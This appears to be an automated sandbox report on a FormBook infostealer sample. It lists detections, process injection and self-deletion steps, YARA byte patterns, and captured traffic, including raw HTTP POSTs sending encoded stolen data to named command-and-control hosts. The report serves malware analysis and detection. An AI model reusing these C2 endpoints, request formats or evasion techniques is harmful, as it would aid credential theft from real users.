Loading ...

Play interactive tourEdit tour

Analysis Report fbfilex.exe

Overview

General Information

Sample Name:fbfilex.exe
Analysis ID:286347
MD5:85f6afcb5108fc4abb34af4b61165fc3
SHA1:4b25756bedfe52c907c4e41c9ff33cde2d96a2cc
SHA256:abdcaa24ca253113905e140a11a445eec5f758bd6403ccf805f87be5c30ea4a3
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • fbfilex.exe (PID: 6712 cmdline: 'C:\Users\user\Desktop\fbfilex.exe' MD5: 85F6AFCB5108FC4ABB34AF4B61165FC3)
    • fbfilex.exe (PID: 6764 cmdline: {path} MD5: 85F6AFCB5108FC4ABB34AF4B61165FC3)
    • fbfilex.exe (PID: 6772 cmdline: {path} MD5: 85F6AFCB5108FC4ABB34AF4B61165FC3)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 7124 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • msdt.exe (PID: 7132 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5416 cmdline: /c del 'C:\Users\user\Desktop\fbfilex.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • update4hg4upu.exe (PID: 776 cmdline: C:\Program Files (x86)\Kx2ad\update4hg4upu.exe MD5: 85F6AFCB5108FC4ABB34AF4B61165FC3)
        • ipconfig.exe (PID: 5464 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18349:$sqlite3step: 68 34 1C 7B E1
    • 0x1845c:$sqlite3step: 68 34 1C 7B E1
    • 0x18378:$sqlite3text: 68 38 2A 90 C5
    • 0x1849d:$sqlite3text: 68 38 2A 90 C5
    • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 22 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      27.2.update4hg4upu.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        27.2.update4hg4upu.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        27.2.update4hg4upu.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18349:$sqlite3step: 68 34 1C 7B E1
        • 0x1845c:$sqlite3step: 68 34 1C 7B E1
        • 0x18378:$sqlite3text: 68 38 2A 90 C5
        • 0x1849d:$sqlite3text: 68 38 2A 90 C5
        • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C
        27.2.update4hg4upu.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          27.2.update4hg4upu.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: fbfilex.exeAvira: detected
          Antivirus detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeAvira: detection malicious, Label: TR/Kryptik.obppg
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeAvira: detection malicious, Label: TR/Kryptik.obppg
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeVirustotal: Detection: 38%Perma Link
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\AppData\Local\Temp\Kx2ad\update4hg4upu.exeVirustotal: Detection: 38%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Kx2ad\update4hg4upu.exeReversingLabs: Detection: 41%
          Multi AV Scanner detection for submitted fileShow sources
          Source: fbfilex.exeVirustotal: Detection: 38%Perma Link
          Source: fbfilex.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.440439853.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.234761977.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.430047358.0000000003805000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.199494924.0000000003EB9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.234705355.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.440517576.0000000001130000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.439593285.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 27.2.update4hg4upu.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.2.update4hg4upu.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.fbfilex.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.fbfilex.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: fbfilex.exeJoe Sandbox ML: detected
          Source: 27.2.update4hg4upu.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.fbfilex.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 4x nop then pop ebx3_2_00407AFD
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 4x nop then pop edi3_2_00417B79
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 4x nop then pop ebx27_2_00407AFD
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 4x nop then pop edi27_2_00417B79

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49735
          Source: global trafficHTTP traffic detected: GET /nm8/?BlP=j2AtX6fbeGD14wY2FwtKyV4LPmq5ewzxM8zOxPPeKvmv1woEZvtv/uOqEHkwye1C24Qv&gHu=JlzpxHHpbrFL HTTP/1.1Host: www.13and15whipplerd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nm8/?BlP=EC6YEd6Ru8GqjcFjKihj/qcv2AI5sPo9braew08R3VO4TQMKkE23YRJ+xSY46Z0Hr1Yb&gHu=JlzpxHHpbrFL HTTP/1.1Host: www.put2cents.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: POST /nm8/ HTTP/1.1Host: www.put2cents.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.put2cents.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.put2cents.com/nm8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 6c 50 3d 4d 67 32 69 61 37 50 67 67 75 43 36 7a 76 49 4a 61 69 67 43 7e 65 73 33 35 77 30 5f 70 5f 6f 6d 4e 4b 72 43 31 32 45 6f 33 6d 62 35 45 42 6b 73 72 33 48 78 57 78 42 35 68 79 41 56 31 5a 46 52 7a 54 49 4a 66 77 61 39 4b 6e 42 35 6d 70 5a 37 74 49 75 59 53 73 36 2d 51 71 75 65 38 41 56 4c 52 4e 59 59 37 6b 52 79 53 53 4a 52 46 4a 52 64 6c 79 36 48 78 69 62 59 63 48 4c 39 44 53 53 71 37 4d 4e 38 38 6a 58 68 32 55 31 57 73 44 49 57 43 75 57 61 6e 4f 35 7a 6c 49 42 49 54 65 4e 33 4a 4a 7e 79 39 6d 33 78 4c 6d 7e 42 57 5a 69 47 57 50 63 39 57 4e 72 4e 72 43 58 43 31 65 66 36 37 4c 51 78 30 38 49 45 6b 4e 5a 63 6c 52 28 72 53 46 66 4c 4f 52 77 52 71 57 72 4b 31 63 6b 55 64 4f 6e 70 56 59 68 47 79 4c 55 76 43 6b 50 65 4e 53 41 57 41 49 56 2d 49 49 38 5f 73 51 28 47 43 56 30 4d 58 7a 78 51 46 35 62 44 77 31 42 33 6e 31 55 42 57 71 54 69 54 41 79 7a 6a 56 4e 6b 61 38 34 73 6b 59 66 53 54 6b 75 69 71 48 66 69 63 5f 64 79 6e 39 65 54 44 74 31 4e 48 78 6b 67 4e 36 70 53 6e 4e 55 37 54 6b 64 35 63 73 28 50 5a 59 69 71 56 61 49 58 33 6d 41 46 59 4d 69 41 70 79 53 31 76 6b 63 32 38 47 55 4e 38 4e 6a 30 4c 53 59 70 4d 7a 63 4c 42 59 45 62 47 34 53 69 57 6a 62 38 46 66 4f 53 49 4a 38 71 70 46 74 44 73 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BlP=Mg2ia7PgguC6zvIJaigC~es35w0_p_omNKrC12Eo3mb5EBksr3HxWxB5hyAV1ZFRzTIJfwa9KnB5mpZ7tIuYSs6-Qque8AVLRNYY7kRySSJRFJRdly6HxibYcHL9DSSq7MN88jXh2U1WsDIWCuWanO5zlIBITeN3JJ~y9m3xLm~BWZiGWPc9WNrNrCXC1ef67LQx08IEkNZclR(rSFfLORwRqWrK1ckUdOnpVYhGyLUvCkPeNSAWAIV-II8_sQ(GCV0MXzxQF5bDw1B3n1UBWqTiTAyzjVNka84skYfSTkuiqHfic_dyn9eTDt1NHxkgN6pSnNU7Tkd5cs(PZYiqVaIX3mAFYMiApyS1vkc28GUN8Nj0LSYpMzcLBYEbG4SiWjb8FfOSIJ8qpFtDsA).
          Source: global trafficHTTP traffic detected: POST /nm8/ HTTP/1.1Host: www.put2cents.comConnection: closeContent-Length: 145525Cache-Control: no-cacheOrigin: http://www.put2cents.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.put2cents.com/nm8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 6c 50 3d 4d 67 32 69 61 36 47 52 7a 75 57 72 69 73 73 49 62 79 51 4b 76 76 63 62 39 77 59 57 71 73 49 59 41 38 7e 66 31 32 55 73 38 46 53 6d 54 67 55 73 74 78 7a 32 62 78 42 34 6a 79 41 57 78 5a 49 75 36 68 49 52 66 31 36 58 4b 6e 4a 32 73 4c 42 2d 38 34 76 51 54 4d 6d 53 59 4b 37 4b 38 44 68 2d 53 76 31 64 7e 6b 4e 79 66 47 6c 66 4f 49 42 61 7a 6d 4b 55 34 79 48 5a 61 44 54 65 44 43 28 58 36 75 77 5a 37 68 6a 5f 39 48 70 4e 78 77 42 44 49 5a 43 42 35 4f 39 30 70 70 56 62 65 66 42 7a 4f 49 7e 51 34 6b 66 2d 49 58 61 4c 52 66 53 34 41 61 38 49 51 63 62 7a 72 46 4c 34 79 74 4c 6e 28 49 6b 35 7a 64 45 2d 72 59 39 65 37 53 6e 4a 44 58 48 36 49 52 42 46 31 45 7a 76 28 74 49 4e 61 4d 76 69 66 61 42 39 30 5f 38 37 52 52 72 69 41 6a 55 65 50 6f 46 42 51 5a 6b 6f 31 52 66 4f 46 51 6b 36 54 6a 77 4f 57 70 62 48 34 55 67 65 32 58 34 4b 65 4b 44 50 4e 51 4b 6b 69 47 4a 53 5a 2d 63 4b 71 63 37 50 41 45 71 2d 6c 58 76 61 5a 63 78 31 78 36 76 6b 64 39 30 4e 48 33 59 37 4e 36 70 65 6e 4d 55 56 53 52 31 35 63 34 7a 51 56 5a 69 32 54 61 4a 4c 31 32 77 44 42 4d 76 4e 70 79 4b 31 70 56 74 72 7e 78 49 4e 34 62 6e 33 4c 7a 59 70 50 44 63 4c 48 59 46 62 41 37 72 79 65 51 76 64 4d 74 36 55 62 5a 55 34 69 6b 67 68 36 71 7a 42 53 30 76 75 57 4a 79 51 32 43 4c 68 6a 59 7a 37 75 54 6c 6b 74 31 41 64 53 4b 34 5f 56 30 61 49 6c 50 48 4c 4d 53 7e 57 77 2d 46 4c 49 48 57 63 7e 4b 6a 71 69 36 49 71 33 68 64 4c 75 43 41 2d 30 56 36 38 65 4d 49 31 6c 4b 7a 68 79 79 6e 59 48 56 4f 70 66 4d 6c 46 4d 71 41 5a 46 4c 67 42 75 6b 71 57 74 67 4d 49 46 34 55 4d 4b 70 5a 4c 67 58 52 6b 35 51 30 69 61 6b 44 5a 7a 63 6d 30 68 73 39 46 68 67 50 62 36 72 75 55 69 77 31 79 36 31 4f 37 76 59 6e 5f 51 64 38 33 32 41 6b 4e 74 4d 45 71 6f 31 62 37 55 53 35 4e 32 68 75 55 69 6d 28 41 42 56 7e 39 28 78 31 4f 65 6d 73 34 6e 5a 58 69 78 62 61 54 58 78 74 6e 69 37 7e 71 4f 6a 45 33 59 34 48 6c 43 66 62 2d 4f 49 49 49 43 4b 71 55 6a 4e 46 50 4b 69 4b 50 58 32 45 48 70 53 36 39 74 76 48 57 39 78 33 49 69 6a 76 47 53 4d 41 36 42 6b 62 34 53 36 66 57 61 5f 34 78 74 36 35 55 6c 61 48 4d 59 32 53 56 34 5f 6e 37 6a 79 33 6f 7e 67 33 4e 4b 58 52 6a 57 44 64 36 6b 4f 28 32 67 65 71 72 35 48 6c 45 58 6b 5a 65 44 33 4e 7a 70 45 58 51 42 4c 7e 76 67 73 49 4e 42 4b 78 70 63 59 61 39 33 6d 41 4d 4c 64 66 46 6a 51 38 55 65 34 42 43 49 30 79 77 77 4f 5a 59 71 74 6b 69 64 67 59 2d 42 31 45 6e 38 37 45 30 78 33 7e 42 41 64 36 46 6b 4c 38 62 47 6b 72 56 6b 77 32 47 6f 69 44 37 4f 38 32 78 44 4f 50 36 44 49 6c 78 62 35 49 4b 6e 37 52 6c 46 33 32 41 69 51 34 4f 53 4f 32 6d 46 50 41 74 35 79 73 33 6c 37 6c 55 68 51 7a 49 4b 4
          Source: global trafficHTTP traffic detected: GET /nm8/?BlP=j2AtX6fbeGD14wY2FwtKyV4LPmq5ewzxM8zOxPPeKvmv1woEZvtv/uOqEHkwye1C24Qv&gHu=JlzpxHHpbrFL HTTP/1.1Host: www.13and15whipplerd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nm8/?BlP=EC6YEd6Ru8GqjcFjKihj/qcv2AI5sPo9braew08R3VO4TQMKkE23YRJ+xSY46Z0Hr1Yb&gHu=JlzpxHHpbrFL HTTP/1.1Host: www.put2cents.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.13and15whipplerd.com
          Source: unknownHTTP traffic detected: POST /nm8/ HTTP/1.1Host: www.put2cents.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.put2cents.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.put2cents.com/nm8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 6c 50 3d 4d 67 32 69 61 37 50 67 67 75 43 36 7a 76 49 4a 61 69 67 43 7e 65 73 33 35 77 30 5f 70 5f 6f 6d 4e 4b 72 43 31 32 45 6f 33 6d 62 35 45 42 6b 73 72 33 48 78 57 78 42 35 68 79 41 56 31 5a 46 52 7a 54 49 4a 66 77 61 39 4b 6e 42 35 6d 70 5a 37 74 49 75 59 53 73 36 2d 51 71 75 65 38 41 56 4c 52 4e 59 59 37 6b 52 79 53 53 4a 52 46 4a 52 64 6c 79 36 48 78 69 62 59 63 48 4c 39 44 53 53 71 37 4d 4e 38 38 6a 58 68 32 55 31 57 73 44 49 57 43 75 57 61 6e 4f 35 7a 6c 49 42 49 54 65 4e 33 4a 4a 7e 79 39 6d 33 78 4c 6d 7e 42 57 5a 69 47 57 50 63 39 57 4e 72 4e 72 43 58 43 31 65 66 36 37 4c 51 78 30 38 49 45 6b 4e 5a 63 6c 52 28 72 53 46 66 4c 4f 52 77 52 71 57 72 4b 31 63 6b 55 64 4f 6e 70 56 59 68 47 79 4c 55 76 43 6b 50 65 4e 53 41 57 41 49 56 2d 49 49 38 5f 73 51 28 47 43 56 30 4d 58 7a 78 51 46 35 62 44 77 31 42 33 6e 31 55 42 57 71 54 69 54 41 79 7a 6a 56 4e 6b 61 38 34 73 6b 59 66 53 54 6b 75 69 71 48 66 69 63 5f 64 79 6e 39 65 54 44 74 31 4e 48 78 6b 67 4e 36 70 53 6e 4e 55 37 54 6b 64 35 63 73 28 50 5a 59 69 71 56 61 49 58 33 6d 41 46 59 4d 69 41 70 79 53 31 76 6b 63 32 38 47 55 4e 38 4e 6a 30 4c 53 59 70 4d 7a 63 4c 42 59 45 62 47 34 53 69 57 6a 62 38 46 66 4f 53 49 4a 38 71 70 46 74 44 73 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BlP=Mg2ia7PgguC6zvIJaigC~es35w0_p_omNKrC12Eo3mb5EBksr3HxWxB5hyAV1ZFRzTIJfwa9KnB5mpZ7tIuYSs6-Qque8AVLRNYY7kRySSJRFJRdly6HxibYcHL9DSSq7MN88jXh2U1WsDIWCuWanO5zlIBITeN3JJ~y9m3xLm~BWZiGWPc9WNrNrCXC1ef67LQx08IEkNZclR(rSFfLORwRqWrK1ckUdOnpVYhGyLUvCkPeNSAWAIV-II8_sQ(GCV0MXzxQF5bDw1B3n1UBWqTiTAyzjVNka84skYfSTkuiqHfic_dyn9eTDt1NHxkgN6pSnNU7Tkd5cs(PZYiqVaIX3mAFYMiApyS1vkc28GUN8Nj0LSYpMzcLBYEbG4SiWjb8FfOSIJ8qpFtDsA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 16 Sep 2020 13:12:32 GMTServer: ApacheVary: Accept-Encoding,CookieExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://put2cents.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeContent-Encoding: gzipX-Accel-Expires: 10800Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec b2 6b 6f 24 49 76 24 fa b9 0b e8 ff e0 1d 83 9d ae 82 e8 91 e1 cf f0 a8 66 72 a0 6e 8d 76 05 88 5a 41 33 b3 8b 0b b5 b0 48 26 a3 98 d1 1d cc 67 30 59 e4 68 fe fb 35 3b 1e 99 8c aa 2e 4d d5 ec 68 2f ee 05 2e 40 7a 9e 70 3f 0f 3b 66 76 f9 cd df fd f7 1f 7e ff 7f fd f3 6f d5 6a b8 ef af be 7e 75 c9 5f d5 2f d6 77 f3 a2 5d eb 3f fc ae 50 cb 7e 71 38 cc 8b f5 46 ff 74 50 38 0f c7 bb 42 32 db c5 2d 7f ef db 61 a1 96 ab c5 fe d0 0e f3 e2 0f bf ff 7b 9d 8a f3 fd 7a 71 df ce 8b 63 d7 3e 6e 37 fb 01 cd 36 eb a1 5d 23 ef b1 bb 1d 56 f3 db f6 d8 2d 5b 2d 1f 17 aa 5b 77 43 b7 e8 f5 61 b9 e8 db b9 91 2e 7d b7 fe 59 ed db 7e 5e 6c f7 9b 77 5d df 16 6a b5 6f df cd 8b d5 30 6c 0f 6f 67 b3 bb fb ed 5d b9 d9 df cd de bf 5b cf 8c 14 a1 ec b0 dc 77 db e1 ea f5 bb 87 f5 72 e8 36 eb d7 dc eb cd 1f 79 96 b2 d0 3f 01 98 9a ab 0f 2f ca 7d bb ed 17 cb f6 f5 ec c7 1b d9 f7 c7 9b d9 c5 b7 3f 1d be 7d f3 a7 37 af 6f 37 cb 87 7b 60 2f 4f c1 6f fb 96 3f 6f be bb 9c 8d e3 5e 5d 0e dd d0 b7 57 ff bc b8 6b 41 d5 a0 de 6d 1e d6 b7 97 b3 7c 3b 59 e6 db db f5 41 6f b1 47 3b 2c 57 df e6 8d be 9d cd b6 0f 83 5d a2 e5 a1 5c 6e ee bf 55 b3 2f 28 79 b7 61 fa dd 66 73 d7 b7 8b 6d f7 17 54 1e ca 47 f2 36 49 ce 2f 27 62 c7 ce 87 61 31 74 cb dc 76 b9 df 1c 0e 9b 7d 77 d7 ad 73 67 74 85 a2 eb 76 39 7c 34 b3 58 f4 43 bb 5f 2f 06 e8 35 3c 6d e1 81 c5 76 db 77 cb 05 c5 98 ed 0f 87 bf 79 7f df e3 89 c4 cc 0b f5 eb fd 62 f7 b0 f9 4e fd 7d db de 4e 05 7e fb 11 27 b3 77 92 f0 9f 31 ea 87 cd 3d d5 3b 7c 7e e6 72 cc 9c 0c ff 46 6b f5 fb 55 77 50 87 6e 68 d5 c3 a1 3d a8 61 d5 aa ff 2a 32 a8 bf 5d 2f fa 27 90 76 50 37 4f ea b7 ef 17 cb e1 ba 1d f6 fc de f6 0f e4 ee 18 4b 5b 5a a5 d5 1f 0e dd fa 6e 92 3f ec 17 cb 9f 79 a5 d5 49 86 c7 c7 c7 b2 65 8f fb dc 43 20 29 ad 47 14 ff b4 19 da b7 1f 0e 01 2c 7a 6f f9 b0 df 03 76 ff a4 20 d1 bb ee ee 61 df de aa cd 1a 40 47 dc 25 56 68 f3 06 9b c7 75 bb 57 6b ec 07 0c 1b b5 78 c0 36 eb 81 1c b6 ea b1 1b 56 bf dc ac 5b cb c6 1f 0c 3e b4 c3 00 f0 58 73 b1 6e fb 72 0a 52 fd e1 6f 01 e3 b6 65 ce cb fd ec f3 8c 31 f7 ab af 2e 0f cb 7d b7 1d 18 7e f5 d8 ad 6f 37 8f e5 ff 7a dc b6 f7 9b 9f ba df 9d 86 ce d5 1f 8b 9b c5 a1 fd c3 be 2f de 16 99 be 1f 67 3f 9e 7c fe e3 ac bb 5f dc b5 87 1f a1 e7 be fd 71 26 c5 3f ce 8c 2b ab b2 fa 71 56 db f7 b5 fd 71 56 5c 14 ed fb 01 f5 e5 76 7d 87 8f c3 f1 ee 7f af 1f 0a a5 1b 7e 7f 9b 1b 22 e2 f7 e6 61 bf 6c 8b b7 7f 2c a0 0a f9 65 d9 d8 5f da 